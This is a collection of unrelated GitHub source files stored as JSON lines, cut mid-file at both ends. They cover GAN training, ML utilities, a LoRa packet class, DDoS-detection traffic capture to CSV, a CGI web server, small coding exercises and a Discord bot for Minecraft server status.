f\"[Train]_[Elapsed time - {elapsed_time}]_[iter - {cur_iter}/{args.n_iters}]_[Epoch - {epoch}]_[D/loss - {model.D_loss_val:.4f}]_[G/loss - {model.G_loss_val:.4f}]_[D/loss avg - {loss_D_meter.avg:.4f}]_[G/loss avg - {loss_G_meter.avg:.4f}]\"\n logger.write(msg)\n if cur_iter % args.model_save_iter_freq == 0:\n to_path = opj(args.model_save_dir, f\"{cur_iter}_{args.n_iters}.pth\")\n model.save(to_path)\n if cur_iter % args.img_save_iter_freq == 0:\n real_img_img = tensor2img(model.real_img)\n gene_img_img = tensor2img(model.recon_img)\n save_img = np.concatenate([real_img_img, gene_img_img], axis=1)\n to_path = opj(args.img_save_dir, f\"{cur_iter}_{args.n_iters}.png\")\n if args.local_rank == 0:\n cv2.imwrite(to_path, save_img[:,:,::-1])\n if cur_iter == args.n_iters:\n break_flag = True\n break\n if args.use_DDP:\n dist.barrier()\n cur_iter += 1\n\n if break_flag: \n break\nif __name__ == \"__main__\":\n args = build_args()\n logger = Logger(args.local_rank, no_save=args.no_save)\n logger.open(args.log_path)\n print_args(args, logger)\n cudnn.benchmark = True\n main_worker(args, logger)\n 
","repo_name":"rlawjdghek/Generative_Models","sub_path":"GANs/VQ-GAN/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12076261135","text":"import os\nimport sys\nimport pickle\nimport numpy as np\nimport pandas as pd\nfrom src.logger import logging\nfrom src.exception import CustomException\nfrom sklearn.metrics import r2_score, mean_absolute_error, mean_squared_error\n\ndef save_object(obj_file_path, obj):\n try:\n dir_path = os.path.dirname(obj_file_path)\n\n os.makedirs(dir_path, exist_ok=True)\n\n with open(obj_file_path, 'wb') as file_obj:\n pickle.dump(obj, file_obj)\n\n except Exception as e:\n raise CustomException(e, sys)\n \n\ndef evaluate_models(X_train, y_train, X_test, y_test, models):\n logging.info('Evaluating all models passed .. ')\n try:\n report = {}\n max_test_score = 0\n best_model_name = None\n\n for model in models.keys():\n\n curr_model = models[model]\n curr_model.fit(X_train, y_train)\n\n y_test_pred = curr_model.predict(X_test)\n test_model_score = r2_score(y_test, y_test_pred)\n\n if (test_model_score > max_test_score):\n max_test_score = test_model_score\n best_model_name = model\n\n report[model] = test_model_score\n \n return (\n report,\n max_test_score,\n best_model_name\n )\n\n except Exception as e:\n logging.error('Something went wrong while evaluating the model')\n raise CustomException(e, sys)\n\n\ndef load_object(obj_file_path):\n try:\n with open(obj_file_path, 'rb') as file_obj:\n return pickle.load(file_obj)\n except Exception as e:\n logging.error('Something went wrong while loading pickle file')\n raise CustomException(e, sys)","repo_name":"myGreatLoveM/ml_project_regressor","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43146054352","text":"import struct\nimport hashlib\nimport binascii\ntry:\n from ujson import loads, dumps\nexcept:\n from json import loads, dumps\n\nclass Packet:\n\n HEADER_SIZE_P2P = 20\n HEADER_FORMAT_P2P = \"!8s8sB3s\" #Source, Destination, Flags, Check Sum\n HEADER_SIZE_MESH = 22\n HEADER_FORMAT_MESH = \"!8s8sB2s3s\" #Source, Destination, Flags, ID, Check Sum\n\n OK = \"OK\"\n METADATA = \"METADATA\" #\"request-data-info\"\n CHUNK = \"CHUNK\" #\"chunk-\"\n DATA = \"DATA\"\n COMMAND = {DATA: \"00\", OK: \"01\", CHUNK: \"10\", METADATA: \"11\"}\n COMMAND_BITS = {\"00\": DATA, \"01\": OK, \"10\": CHUNK, \"11\": METADATA}\n\n @staticmethod\n def check_command(command: str) -> bool:\n if command in Packet.COMMAND:\n return True\n return False\n\n def __init__(self, mesh_mode):\n self.mesh_mode = mesh_mode\n\n if not self.mesh_mode:\n self.HEADER_SIZE = self.HEADER_SIZE_P2P\n self.HEADER_FORMAT = self.HEADER_FORMAT_P2P\n else:\n self.HEADER_SIZE = self.HEADER_SIZE_MESH\n self.HEADER_FORMAT = self.HEADER_FORMAT_MESH\n\n self.source = '' # 8 Bytes mac address of the source\n self.destination = '' # 8 Bytes mac address of the destination\n\n self.checksum = None # Checksum\n self.payload = b'' # Content of the message\n\n self.check = None # True if checksum is correct with content\n\n ## Flags:\n self.command = None # Type of command / or Data bit: 0, 1\n # Only for mesh mode\n self.mesh = False # Mesh On or Off for this Node bit: 3\n self.sleep = True # True if should sleep before forwarding message bit: 4\n self.hop = False # If packet was 
forwarded -> 1, else -> 0 bit: 5\n self.debug_hops = False # Overrides payload to get path details (hops) bit: 6\n # Change settings\n self.change_sf = False # If True, check payload to change SF bit: 7\n\n # For mesh\n self.id = None # Random number from 0 to 65,535\n\n def set_source(self, source: str):\n self.source = source\n\n def get_source(self):\n return self.source\n\n def set_destination(self, destination: str):\n self.destination = destination\n\n def get_destination(self):\n return self.destination\n\n def get_command(self):\n return self.command\n\n def set_ok(self):\n self.command = \"OK\"\n\n def ask_metadata(self):\n self.command = \"METADATA\"\n\n def set_metadata(self, length, name):\n self.command = \"METADATA\"\n metadata = {\"LENGTH\" : length, \"FILENAME\": name}\n self.payload = dumps(metadata).encode()\n\n def get_payload(self):\n return self.payload\n\n def get_metadata(self):\n if self.command == \"METADATA\":\n try:\n return loads(self.payload)\n except:\n return None\n\n def ask_data(self, next_chunk):\n self.command = \"CHUNK\"\n self.payload = str(next_chunk).encode()\n\n def set_data(self, chunk):\n self.command = \"DATA\"\n self.payload = chunk\n\n def get_mesh(self):\n return self.mesh\n\n def enable_mesh(self):\n self.mesh = True\n\n def disable_mesh(self):\n self.mesh = False\n\n def enable_hop(self):\n self.hop = True\n\n def get_hop(self):\n return self.hop\n\n def get_debug_hops(self):\n return self.debug_hops\n\n def enable_debug_hops(self):\n self.debug_hops = True\n\n def disable_debug_hops(self):\n self.debug_hops = False\n\n def enable_sleep(self):\n self.sleep = True\n\n def disable_sleep(self):\n self.sleep = False\n\n def get_sleep(self):\n return self.sleep\n\n def get_change_sf(self):\n return self.change_sf\n\n def set_change_sf(self, sf):\n self.set_ok()\n self.change_sf = True\n self.payload = dumps(sf).encode()\n\n def get_message_path(self):\n if self.debug_hops:\n try:\n return loads(self.payload)\n except:\n return None\n\n def add_hop(self, name, rssi, time_sleep):\n hop = (name, rssi, time_sleep)\n path = self.get_message_path()\n if isinstance(path, list):\n path.append(hop)\n else:\n path = [hop]\n self.enable_debug_hops()\n self.payload = dumps(path).encode()\n\n def add_previous_hops(self, path):\n if isinstance(path, list):\n self.payload = dumps(path).encode()\n\n def set_id(self, id):\n if id <= 65535:\n self.id = id\n\n def get_id(self):\n return self.id\n\n def get_length(self):\n if len(self.payload) > 0:\n return self.HEADER_SIZE + len(self.payload)\n else:\n return self.HEADER_SIZE\n\n def get_checksum(self, data):\n h = hashlib.sha256(data)\n ha = binascii.hexlify(h.digest())\n return (ha[-3:])\n\n def get_content(self):\n if self.command in self.COMMAND:\n command_bits = self.COMMAND[self.command]\n\n flags = 0\n if command_bits[0] == \"1\":\n flags = flags | (1<<0)\n if command_bits[1] == \"1\":\n flags = flags | (1<<1)\n if self.mesh:\n flags = flags | (1<<3)\n if self.sleep:\n flags = flags | (1<<4)\n if self.hop:\n flags = flags | (1<<5)\n if self.debug_hops:\n flags = flags | (1<<6)\n if self.change_sf:\n flags = flags | (1<<7)\n\n p = self.payload\n self.checksum = self.get_checksum(p)\n\n if self.mesh_mode:\n try:\n id_bytes = self.id.to_bytes(2, 'little')\n except:\n print(self.source.encode(), self.destination.encode(), flags, self.id, self.checksum)\n #print(self.source, self.destination, flags, id_bytes, self.checksum, p)\n h = struct.pack(self.HEADER_FORMAT, self.source.encode(), self.destination.encode(), 
flags, id_bytes, self.checksum)\n else:\n #print(self.source, self.destination, flags, self.checksum, p)\n h = struct.pack(self.HEADER_FORMAT, self.source.encode(), self.destination.encode(), flags, self.checksum)\n\n return h+p\n\n def parse_flags(self, flags: int):\n c0 = \"1\" if (flags >> 0) & 1 == 1 else \"0\"\n c1 = \"1\" if (flags >> 1) & 1 == 1 else \"0\"\n self.command = self.COMMAND_BITS[c0+c1]\n\n self.mesh = (flags >> 3) & 1 == 1\n self.sleep = (flags >> 4) & 1 == 1\n self.hop = (flags >> 5) & 1 == 1\n self.debug_hops = (flags >> 6) & 1 == 1\n self.change_sf = (flags >> 7) & 1 == 1\n\n def load(self, packet):\n header = packet[:self.HEADER_SIZE]\n content = packet[self.HEADER_SIZE:]\n\n if self.mesh_mode:\n self.source, self.destination, flags, id, self.checksum = struct.unpack(self.HEADER_FORMAT, header)\n self.id = int.from_bytes(id, \"little\")\n else:\n self.source, self.destination, flags, self.checksum = struct.unpack(self.HEADER_FORMAT, header)\n\n self.source = self.source.decode()\n self.destination = self.destination.decode()\n\n self.parse_flags(flags)\n\n self.payload = content\n\n self.check = self.checksum == self.get_checksum(self.payload)\n return self.check\n\n def get_dict(self):\n p = self.payload\n self.checksum = self.get_checksum(p)\n d = {\"source\" : self.source,\n \"destination\" : self.destination,\n \"command\" : self.command,\n \"checksum\" : self.checksum.decode(),\n \"payload\" : self.payload.decode(),\n \"mesh\" : self.mesh,\n \"hop\" : self.hop,\n \"sleep\" : self.sleep,\n \"debug_hops\" : self.debug_hops,\n \"change_sf\" : self.change_sf,\n \"id\" :self.id,\n }\n return d\n\n def load_dict(self, d):\n self.source = d[\"source\"]\n self.destination = d[\"destination\"]\n self.command = d[\"command\"]\n self.checksum = d[\"checksum\"].encode()\n self.payload = d[\"payload\"].encode()\n self.mesh = d[\"mesh\"]\n self.hop = d[\"hop\"]\n self.sleep = d[\"sleep\"]\n self.debug_hops = d[\"debug_hops\"]\n self.change_sf = d[\"change_sf\"]\n self.id = d[\"id\"]\n\n self.check = self.checksum == self.get_checksum(self.payload)\n return self.check\n\nif __name__ == \"__main__\":\n mac_address_A = \"70b3d5499a76ba3f\"[8:]\n mac_address_B = \"70b3d54993a5bb9c\"[8:]\n\n mesh_mode = True\n\n content = b\"TEST...\"\n\n s_addr = mac_address_A\n d_addr = mac_address_B\n\n print(\"P1: \")\n p = Packet(mesh_mode)\n p.set_source(s_addr)\n p.set_destination(d_addr)\n\n if mesh_mode:\n id = 555\n #p.set_retransmission(2)\n p.enable_mesh()\n p.enable_hop()\n p.set_id(id)\n\n #p.ask_data(1500)\n #p.set_data(content)\n p.set_metadata(5, \"test\")\n packet = p.get_content()\n print(\"Packet: {}\".format(packet))\n print(p.get_payload())\n\n print(\"\\nP2: \")\n p2 = Packet(mesh_mode)\n successfull = p2.load(packet)\n packet2 = p2.get_content()\n print(\"Packet loaded: {}\".format(packet2))\n print(p2.get_payload())\n js = p2.get_dict()\n print(js)\n\n print(\"\\nP3: \")\n p3 = Packet(mesh_mode)\n success = p3.load_dict(js)\n print(success)\n packet = p3.get_content()\n print(\"Packet: {}\".format(packet))\n #print(p3.get_payload())\n metadata = p3.get_metadata()\n length = metadata[\"LENGTH\"]\n filename = metadata[\"FILENAME\"]\n print(length, filename)\n\n print(Packet.check_command(\"OK\"))\n print(Packet.check_command(\"METADATA\"))\n print(Packet.check_command(\"DATA\"))\n print(Packet.check_command(\"CHUNK\"))\n 
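# an unknown command name is rejected (check_command returns False):\n 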
print(Packet.check_command(\"Other\"))\n","repo_name":"SMARTLAGOON/AlLoRa","sub_path":"AlLoRa/Packet.py","file_name":"Packet.py","file_ext":"py","file_size_in_byte":10148,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"2148829593","text":"#flow_duration, ip_proto, src_port, dstport, byte_count, packet_count, label\n\nimport csv\nimport subprocess\nfrom Collect_ddos_attack import CollectTrainingStatsApp\n\n\n\ndef attack_generation():\n # Step 4: Generate DDoS attack and save data\n #CollectTrainingStatsApp()\n # Assuming the attack traffic has been generated and captured by ITGRecv\n capture_file = 'capture.txt'\n with open(capture_file, 'w') as f:\n subprocess.call([\"./ITGRecv\"], stdout=f) # Run ITGRecv and capture output to file\n\n # Read the captured traffic data from the ITGRecv output file\n captured_data = []\n with open(capture_file, 'r') as f:\n for line in f:\n # Extract the required fields from each line and add them to the captured_data list\n fields = line.strip().split(',') # Adjust the splitting logic based on the actual output format\n timestamp = fields[0]\n datapath_id = fields[1]\n flow_id = fields[2]\n ip_src = fields[3]\n tp_src = fields[4]\n ip_dst = fields[5]\n tp_dst = fields[6]\n ip_proto = fields[7]\n icmp_code = fields[8]\n icmp_type = fields[9]\n flow_duration_sec = fields[10]\n flow_duration_nsec = fields[11]\n idle_timeout = fields[12]\n hard_timeout = fields[13]\n flags = fields[14]\n packet_count = fields[15]\n byte_count = fields[16]\n packet_count_per_second = fields[17]\n packet_count_per_nsecond = fields[18]\n byte_count_per_second = fields[19]\n byte_count_per_nsecond = fields[20]\n label = fields[21]\n\n captured_data.append({\n 'timestamp': timestamp,\n 'datapath_id': datapath_id,\n 'flow_id': flow_id,\n 'ip_src': ip_src,\n 'tp_src': tp_src,\n 'ip_dst': ip_dst,\n 'tp_dst': tp_dst,\n 'ip_proto': ip_proto,\n 'icmp_code': icmp_code,\n 'icmp_type': icmp_type,\n 'flow_duration_sec': flow_duration_sec,\n 'flow_duration_nsec': flow_duration_nsec,\n 'idle_timeout': idle_timeout,\n 'hard_timeout': hard_timeout,\n 'flags': flags,\n 'packet_count': packet_count,\n 'byte_count': byte_count,\n 'packet_count_per_second': packet_count_per_second,\n 'packet_count_per_nsecond': packet_count_per_nsecond,\n 'byte_count_per_second': byte_count_per_second,\n 'byte_count_per_nsecond': byte_count_per_nsecond,\n 'label': label\n })\n\n # Save the captured data to a CSV file\n csv_file = 'captured_data.csv'\n fieldnames = ['timestamp', 'datapath_id', 'flow_id', 'ip_src', 'tp_src', 'ip_dst', 'tp_dst',\n 'ip_proto', 'icmp_code', 'icmp_type', 'flow_duration_sec', 'flow_duration_nsec',\n 'idle_timeout', 'hard_timeout', 'flags', 'packet_count', 'byte_count',\n 'packet_count_per_second', 'packet_count_per_nsecond', 'byte_count_per_second',\n 'byte_count_per_nsecond', 'label']\n\n with open(csv_file, 'w', newline='') as f:\n writer = csv.DictWriter(f, fieldnames=fieldnames)\n writer.writeheader()\n writer.writerows(captured_data)\n","repo_name":"Viswanath-621/Preventing-Network-Attacks-An-Integrated-Approach-using-Linear-SVM-and-SDN-Environment","sub_path":"Python files/AttackGeneration.py","file_name":"AttackGeneration.py","file_ext":"py","file_size_in_byte":3412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32221351027","text":"'''\nВеб сервер\nВ текущем каталоге должны быть подкаталоги\ncgi-bin и ntbin\n'''\nimport os, sys\nfrom http.server import 
HTTPServer, CGIHTTPRequestHandler\n\nwebdir = '.' # HTML files and the cgi-bin subdirectory\nport = 80 # Port\n\nos.chdir(webdir) # change into the HTML directory\nsrvaddr = ('', port) # host name and port\nsrvrobj = HTTPServer(srvaddr, CGIHTTPRequestHandler)\nsrvrobj.serve_forever() # Run as an endless background process \n","repo_name":"st0ll1/book","sub_path":"db/web_interface/webserver.py","file_name":"webserver.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"33227975932","text":"# Given an array A of non-negative integers, half of the integers in A are odd,\n# and half of the integers are even.\n#\n# Sort the array so that whenever A[i] is odd, i is odd; and whenever A[i] is even, i is even.\n#\n# You may return any answer array that satisfies this condition.\n#\n# Example 1:\n#\n# Input: [4, 2, 5, 7]\n# Output: [4, 5, 2, 7]\n# Explanation: [4, 7, 2, 5], [2, 5, 4, 7], [2, 7, 4, 5] would also have been accepted.\n\ndef sort_even_odd_based_on_array_index(arr):\n result = [0 for num in arr]\n even_index = 0\n odd_index = 1\n for num in arr:\n if num%2 == 0:\n result[even_index] = num\n even_index += 2\n else:\n result[odd_index] = num\n odd_index += 2\n print(result)\n\narr = [4, 2, 5, 7]\nsort_even_odd_based_on_array_index(arr)","repo_name":"avidekar/python-assignments","sub_path":"sort_even_odd_based_on_array_index.py","file_name":"sort_even_odd_based_on_array_index.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"69811583185","text":"#coding=utf-8\n'''\nImplement a queue with two stacks, supporting the queue's Push and Pop operations. The elements in the queue are of type int.\n'''\nclass Solution:\n def __init__(self):\n #two stacks A, B\n #list.append() is push and list.pop() is pop\n self.a=[]\n self.b=[]\n def push(self, node):\n # write code here\n self.a.append(node)\n def pop(self):\n # return the front element, or None if the queue is empty\n if len(self.a) == 0:\n return None\n while len(self.a):\n self.b.append(self.a.pop())\n out = self.b.pop()\n while len(self.b):\n self.a.append(self.b.pop())\n return out\n","repo_name":"lanpartis/jianzhiOffer_practice","sub_path":"5_two_stack_a_queue.py","file_name":"5_two_stack_a_queue.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"74271449746","text":"from core.linked_list import LinkedList\nfrom core.node import Node\nfrom core.utils import numberize\n\n\nclass DataRow(LinkedList):\n\n def __init__(self, *args) -> None:\n super().__init__()\n for arg in args:\n arg = numberize(arg)\n if type(arg) == str:\n if \"\\\"\" in arg or \"\\'\" in arg:\n arg: str = arg.replace(\"'\", \"\").replace('\"', '').replace(\"\\\\\", \" \")\n else:\n continue\n self.append(arg)\n\n def __str__(self) -> str:\n result = super().__str__()\n return result.replace(\",\", \" |\").replace(\"[\", \"\").replace(\"]\", \"\")\n\n @property\n def root(self) -> Node:\n return self.head\n\n def str_justed_by(self, value) -> str:\n results = self.iter(\n (lambda node, index: repr(node.value).ljust(value).replace(\"'\", '\"')),\n (lambda node, index: False)\n )\n result = str(results)\n return result.replace(\",\", \" |\").replace(\"[\", \"\").replace(\"]\", 
\"\")\n","repo_name":"eanorambuena/EQL","sub_path":"engine/row.py","file_name":"row.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"32312875650","text":"import os\nimport click\nfrom flask import current_app, g\nfrom flask.cli import with_appcontext\nimport psycopg2 as psql\n\n\ndef get_db():\n if 'db' not in g:\n # Get DB environment var\n DATABASE_URL = os.environ['DATABASE_URL']\n\n g.db = psql.connect(DATABASE_URL)\n\n return g.db\n\n\ndef close_db(e=None):\n db = g.pop('db', None)\n\n if db is not None:\n db.close()\n\n\ndef init_db():\n db = get_db()\n\n cur = db.cursor()\n\n with current_app.open_resource('postgresql_schema.sql') as sql:\n cur.execute(sql.read().decode('utf8'))\n db.commit()\n cur.close()\n\n\n@click.command('init-db')\n@with_appcontext\ndef init_db_command():\n \"\"\"Clear the existing data and create new tables.\"\"\"\n init_db()\n click.echo('Initialized the database.')\n\n\ndef init_app(app):\n app.teardown_appcontext(close_db)\n app.cli.add_command(init_db_command)\n","repo_name":"forgineer/bootstrap-budget","sub_path":"bootstrap/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73570014226","text":"import discord\nfrom discord.ext import commands\nfrom discord_slash import SlashCommand, SlashContext\nfrom discord_slash.utils.manage_commands import create_option\nimport mcstatus\nimport peewee as pw\nimport aioredis\n\nimport os\nimport asyncio\nimport logging\nimport time\nimport re\nimport base64\nimport io\nimport hashlib\nimport traceback\n\nimport migrations\n\nlogging.basicConfig(level=logging.INFO)\n\nDISCORD_TOKEN = os.getenv('DISCORD_TOKEN') or None\nURL_PREFIX = os.getenv('URL_PREFIX') or None\nif URL_PREFIX is None:\n logging.error(\"URL_PREFIX is unset! 
Server favicons will not be sent!\")\n\nbot = commands.Bot(command_prefix=\"!\")\nslash = SlashCommand(bot, sync_commands=True)\n\ndb = pw.SqliteDatabase('/config.db')\n\nmigrations.perform_migrations(db)\n\ndef file_hash(data):\n return hashlib.sha256(data).hexdigest()\n\nclass MyModel(pw.Model):\n class Meta:\n database = db\n\nclass Server(MyModel):\n ip = pw.CharField()\n port = pw.IntegerField()\n note = pw.CharField()\n guild = pw.BigIntegerField()\n command = pw.CharField()\n description = pw.CharField()\n channel_whitelist = pw.TextField(null=True)\n message_on_alien_detected = pw.TextField(null=True)\n\n class Meta:\n indexes = [\n (('ip', 'port',), False),\n (('guild', 'command',), True),\n ]\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n\n @property\n def markdown(self):\n return '`'+self.ip+'`:`'+str(self.port)+'`'\n\n @property\n def mcstatus(self):\n return mcstatus.MinecraftServer(self.ip, self.port)\n\n def channel_in_whitelist(self, channel):\n if self.channel_whitelist is None: return True\n if isinstance(channel, discord.abc.Snowflake):\n channel = channel.id\n channel = str(channel)\n return channel in self.channel_whitelist.split()\n\nclass PlayerID(MyModel):\n discord_id = pw.BigIntegerField(unique=True)\n minecraft_username = pw.CharField(unique=True)\n\n @classmethod\n def contains(cls, other):\n # this will probably be used in conjunction with resolve(), but because the expected data volume is low, we can rely on the database to cache the result.\n try:\n item = cls.resolve(other)\n return True\n except cls.DoesNotExist:\n return False\n\n @classmethod\n def resolve(cls, other):\n if isinstance(other, int):\n return cls.get(cls.discord_id==other).minecraft_username\n else:\n return cls.get(cls.minecraft_username==other).discord_id\n\ndb.create_tables([Server, PlayerID])\n\ndef get_pending_embed(server):\n return discord.Embed(description='Querying server at ' + server.markdown + ' for information...', colour=discord.Colour.blue()) \n\ndef get_ping_pending_query_embed(server, ping, query=None):\n emb = discord.Embed(title='Server status:', colour=discord.Colour.from_rgb(255, 255, 0))\n emb.add_field(name='Server IP', value=server.markdown)\n emb.add_field(name='Ping latency', value=str(round(ping.latency, 2))+' ms', inline=True)\n emb.add_field(name='Slots', value=str(ping.players.online)+' / '+str(ping.players.max), inline=True)\n emb.add_field(name='Information limited', value='Waiting for query result from server...' if query is None else 'Server did not respond to query request.')\n return emb\n\ndef get_error_embed(server):\n emb = discord.Embed(colour=discord.Colour.from_rgb(255, 0, 0))\n emb.description = 'Server did not respond to ping or query request. 
Is it offline or overloaded?'\n return emb\n\ndef get_query_result_embed(server, query=None, ping=None):\n data = {}\n aliens = []\n qfailed = False\n if query == False:\n qfailed = True\n \n if query:\n q = {'latency': query.latency}\n q.update(query.raw)\n qplayers = query.players.names\n query = q\n else:\n query = {}\n qplayers = []\n \n if ping:\n p = {'latency': ping.latency}\n p.update(ping.raw)\n ping = p\n else: ping = {}\n data['latency'] = max(query.get('latency') or 0, ping.get('latency') or 0)\n data['version'] = ping.get('version', {}).get('name') or query.get('software', {}).get('version')\n data['plugins'] = query.get('software', {}).get('plugins', [])\n data['favicon'] = ping.get('favicon')\n data['motd'] = ping.get('description') or query.get('hostname')\n data['modinfo'] = ping.get('modinfo') or ping.get('forgeData')\n data['slots-online'] = query.get('players', {}).get('online') or ping.get('players', {}).get('online')\n data['slots-max'] = query.get('players', {}).get('max') or ping.get('players', {}).get('max')\n data['players'] = qplayers or [x.get('name') for x in ping.get('players', {}).get('sample', [])]\n\n to_del = []\n for key in data:\n if not bool(data[key]): to_del.append(key)\n\n for key in to_del:\n if key == 'slots-online': continue\n del data[key]\n\n\n emb = discord.Embed(description='Server stats:', colour=discord.Colour.green()).add_field(name=\"Server IP\", value=server.markdown, inline=False)\n \n if 'latency' in data:\n emb.add_field(name='Request latency', value=str(round(data['latency'], 2))+' ms')\n\n if 'version' in data:\n emb.add_field(name='Server version', value=data['version'])\n\n if 'motd' in data:\n motd = data['motd']\n if isinstance(motd, dict) and list(motd) == ['text']: motd = motd['text']\n motd = str(motd)\n if len(motd)>1024: # cannot be longer than 1024 characters\n motd = motd[:1020] + '...'\n motd = re.sub('§.', '', motd) # remove all formatting characters\n emb.add_field(name='MOTD', value=motd)\n\n if 'slots-online' in data or 'slots-max' in data:\n emb.add_field(name='Slots', value=str(data.get('slots-online', '?'))+'/'+str(data.get('slots-max', '?')))\\\n\n if 'plugins' in data:\n emb.add_field(name='Plugins', value=data['plugins'], inline=False)\n\n if 'players' in data:\n player_list = ''\n for nick in data['players']:\n player_list += discord.utils.escape_markdown(nick)\n if PlayerID.contains(nick):\n player_list += ' (aka <@'+str(PlayerID.resolve(nick))+'>)'\n else:\n aliens.append(nick)\n player_list += '\\n'\n emb.add_field(name='Players', value=player_list)\n\n if not query or not ping:\n if qfailed: desc = 'Querying the server failed, is the query interface not enabled?'\n elif query == dict(): desc = 'Waiting for result of query...'\n elif ping == dict(): desc = 'Waiting for result of ping...'\n else: desc = 'Pinging the server failed. This should not happen. 
'+str({'query': query, 'ping': len(ping)})\n emb.add_field(name='Incomplete data', value=desc)\n emb.colour = discord.Colour.gold()\n\n if data.get('favicon'):\n res = re.match('data:image\\/(.*);base64,(.*)', data['favicon'])\n ext = res.group(1)\n imgdata = base64.b64decode(bytes(res.group(2), 'utf-8'))\n if URL_PREFIX:\n emb.set_thumbnail(url=URL_PREFIX+file_hash(imgdata)+'.'+ext)\n\n return emb, data.get('favicon'), aliens\n \n\ndef get_msg_embed(server, query=None, ping=None):\n favicon = None\n aliens = []\n if query is None and ping is None:\n emb = get_pending_embed(server)\n elif ping is False and not query:\n emb = get_error_embed(server)\n else:\n emb, favicon, aliens = get_query_result_embed(server, query=query, ping=ping)\n\n if server.note:\n emb = emb.add_field(name=\"Note\", value=server.note)\n return emb, favicon, aliens\n\ndef measure_latency(func):\n start = time.time()\n result = func()\n elapsed = time.time() - start\n result.latency = elapsed * 1000\n return result\n\n@slash.slash(name=\"status\",\n description=\"Fetch a Minecraft server's status.\",\n options=[\n create_option(name=\"ip\", description=\"The server's connection IP.\", option_type=3, required=True),\n create_option(name=\"port\", description=\"The server's connection port. Defaults to 25565.\", option_type=4, required=False)\n ])\nasync def send_status(ctx, ip, port=25565, note=None, msg_on_aliens=None):\n if ':' in ip:\n ip, port_line = ip.split(':')\n else: port_line = None\n port = int(port_line or port or 25565)\n server = Server(ip=ip, port=port)\n server.note = note\n sr = server.mcstatus\n \n await ctx.defer(hidden=False)\n \n ping = bot.loop.run_in_executor(None, sr.status)\n query = bot.loop.run_in_executor(None, measure_latency, sr.query)\n\n\n # favicons are returned by ping requests, so when one is completed we delete our message and resend it with attachment\n\n done, pending = await asyncio.wait([ping, query], return_when=asyncio.FIRST_COMPLETED)\n\n done, pending = await asyncio.wait([ping, query], return_when=asyncio.ALL_COMPLETED)\n\n try:\n ping_res = await ping\n except:\n ping_res = False\n\n try:\n query_res = await query\n except:\n query_res = False\n \n e,f,aliens = get_msg_embed(server, query=query_res, ping=ping_res)\n if f:\n res = re.match('data:image\\/(.*);base64,(.*)', f)\n ext = res.group(1)\n data = res.group(2)\n data = base64.b64decode(bytes(data, 'utf-8'))\n try:\n redis = await aioredis.create_redis('redis://redisserver')\n await redis.set(file_hash(data)+'.'+ext, data)\n #r = redis.Redis('redis://database')\n #r.set(file_hash(data)+'.'+ext, data)\n except:\n traceback.print_exc()\n e.thumbnail = discord.Empty\n\n msg = None\n if aliens and msg_on_aliens:\n aliens_list = ', '.join([discord.utils.escape_markdown(nick) for nick in aliens])\n msg = msg_on_aliens.format(aliens_list=aliens_list)\n msg = await ctx.send(content=msg, embed=e, allowed_mentions=discord.AllowedMentions.all())\n\n\ndef sync_guild_commands():\n for serv in Server.select().iterator():\n @slash.slash(name=serv.command, guild_ids=[serv.guild], description=serv.description, options=[])\n async def guild_command(ctx, ip=serv.ip, port=serv.port, note=serv.note, msg_on_aliens=serv.message_on_alien_detected, serv=serv):\n if serv.channel_in_whitelist(ctx.channel):\n await send_status.invoke(ctx, ip, port, note=note, msg_on_aliens=msg_on_aliens)\n else:\n await ctx.send(\"Sorry, you are not allowed to run this command in this channel. 
For more information, check this server's rules or contact an admin.\", hidden=True)\n\n\n@slash.slash(name=\"mcwho\",\n description=\"Identify a Discord user's Minecraft username.\",\n options=[\n create_option(name=\"user\", description=\"The user to lookup.\", option_type=6, required=True),\n ])\nasync def mcwho(ctx, user: discord.User):\n try:\n username = PlayerID.resolve(user.id)\n await ctx.send('User ' + user.mention + ' is associated with this Minecraft username: `'+username+'`.', allowed_mentions=discord.AllowedMentions.none())\n except PlayerID.DoesNotExist:\n await ctx.send('User ' + user.mention + ' is not associated with any Minecraft username.', allowed_mentions=discord.AllowedMentions.none())\n\n@slash.slash(name=\"discordwho\",\n description=\"Identify a Minecraft player's Discord account.\",\n options=[\n create_option(name=\"username\", description=\"The username to lookup.\", option_type=3, required=True),\n ])\nasync def discordwho(ctx, username):\n try:\n uid = PlayerID.resolve(username)\n await ctx.send('Minecraft username `'+username+'` is associated with this Discord user: <@'+str(uid)+'>.', allowed_mentions=discord.AllowedMentions.none())\n except PlayerID.DoesNotExist:\n await ctx.send('Minecraft username `'+username+'` is not associated with a Discord user.', allowed_mentions=discord.AllowedMentions.none())\n\nif __name__ == '__main__':\n sync_guild_commands()\n bot.run(DISCORD_TOKEN)\n","repo_name":"danya02/discord-minecraft-status","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73782036626","text":"class CalculateROI():\n\n\tdef __init__(self):\n\t\tself.income = 0\n\t\tself.expenses = 0\n\t\tself.investement = 0\n\t\tself.ROI = 0\n\n\tdef incomeInput(self):\n\t\tlaundry = input(\"How much money did you make from laundry? \")\n\t\trental = input(\"How much money did you make from your rental properties? \")\n\t\tstorage = input(\"How much money did you make from storage? \")\n\t\tmisc = input(\"How much money did you make from misc items? \")\n\t\tself.income = int(laundry) + 